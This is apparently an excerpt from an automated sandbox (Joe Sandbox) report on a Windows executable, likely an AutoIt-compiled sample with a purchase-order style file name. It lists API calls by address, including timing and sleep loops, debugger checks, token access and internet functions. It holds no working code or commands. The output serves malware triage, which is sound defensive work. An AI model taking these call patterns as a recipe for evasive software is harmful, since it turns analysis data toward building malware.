                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0C4
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0E9
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0F3
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B126
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F62DC5
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F62DD6
                          • GetCurrentThreadId.KERNEL32 ref: 00F62DDD
                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F62DE4
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00F19639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196A2
                            • Part of subcall function 00F19639: BeginPath.GDI32(?), ref: 00F196B9
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196E2
                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00F98887
                          • LineTo.GDI32(?,?,?), ref: 00F98894
                          • EndPath.GDI32(?), ref: 00F988A4
                          • StrokePath.GDI32(?), ref: 00F988B2
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          APIs
                          • GetSysColor.USER32(00000008), ref: 00F198CC
                          • SetTextColor.GDI32(?,?), ref: 00F198D6
                          • SetBkMode.GDI32(?,00000001), ref: 00F198E9
                          • GetStockObject.GDI32(00000005), ref: 00F198F1
                          Similarity
                          • API ID: Color$ModeObjectStockText
                          • String ID:
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00F61634
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F611D9), ref: 00F6163B
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F611D9), ref: 00F61648
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F611D9), ref: 00F6164F
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          APIs
                          • GetDesktopWindow.USER32 ref: 00F5D858
                          • GetDC.USER32(00000000), ref: 00F5D862
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5D882
                          • ReleaseDC.USER32(?), ref: 00F5D8A3
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                          • GetDesktopWindow.USER32 ref: 00F5D86C
                          • GetDC.USER32(00000000), ref: 00F5D876
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5D882
                          • ReleaseDC.USER32(?), ref: 00F5D8A3
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F74ED4
                          Similarity
                          • API ID: Connection_wcslen
                          • String ID: *$LPT
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00F2E30D
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          Similarity
                          • API ID:
                          • String ID: #
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00F1F2A2
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F1F2BB
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00F857E0
                          • _wcslen.LIBCMT ref: 00F857EC
                          Similarity
                          • API ID: BuffCharUpper_wcslen
                          • String ID: CALLARGARRAY
                          APIs
                          • _wcslen.LIBCMT ref: 00F7D130
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F7D13A
                          Similarity
                          • API ID: CrackInternet_wcslen
                          • String ID: |
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00F93621
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F9365C
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F9461F
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F94634
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F9327C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F93287
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          APIs
                            • Part of subcall function 00F0600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                            • Part of subcall function 00F0600E: GetStockObject.GDI32(00000011), ref: 00F06060
                            • Part of subcall function 00F0600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          • GetWindowRect.USER32(00000000,?), ref: 00F9377A
                          • GetSysColor.USER32(00000012), ref: 00F93794
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7CD7D
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F7CDA6
                          Strings
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00F934AB
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F934BA
                          Strings
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • CharUpperBuffW.USER32(?,?,?), ref: 00F66CB6
                          • _wcslen.LIBCMT ref: 00F66CC2
                          Strings
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: STOP
                          • API String ID: 1256254125-2411985666
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F61D4C
                          Strings
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F61C46
                          Strings
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F61CC8
                          Strings
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F61DD3
                          Strings
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcslen
                          • String ID: 3, 3, 16, 1
                          • API String ID: 176396367-3042988571
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F60B23
                          Strings
                          Similarity
                          • API ID: Message
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 2030045667-4017498283
                          APIs
                            • Part of subcall function 00F1F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F20D71,?,?,?,00F0100A), ref: 00F1F7CE
                          • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F20D75
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F20D84
                          Strings
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F20D7F
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                          • API String ID: 55579361-631824599
                          APIs
                          Strings
                          Similarity
                          • API ID: LocalTime
                          • String ID: %.3d$X64
                          • API String ID: 481472006-1077770165
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F9236C
                          • PostMessageW.USER32(00000000), ref: 00F92373
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Strings
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F9232C
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F9233F
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Strings
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F3BE93
                          • GetLastError.KERNEL32 ref: 00F3BEA1
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3BEFC
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0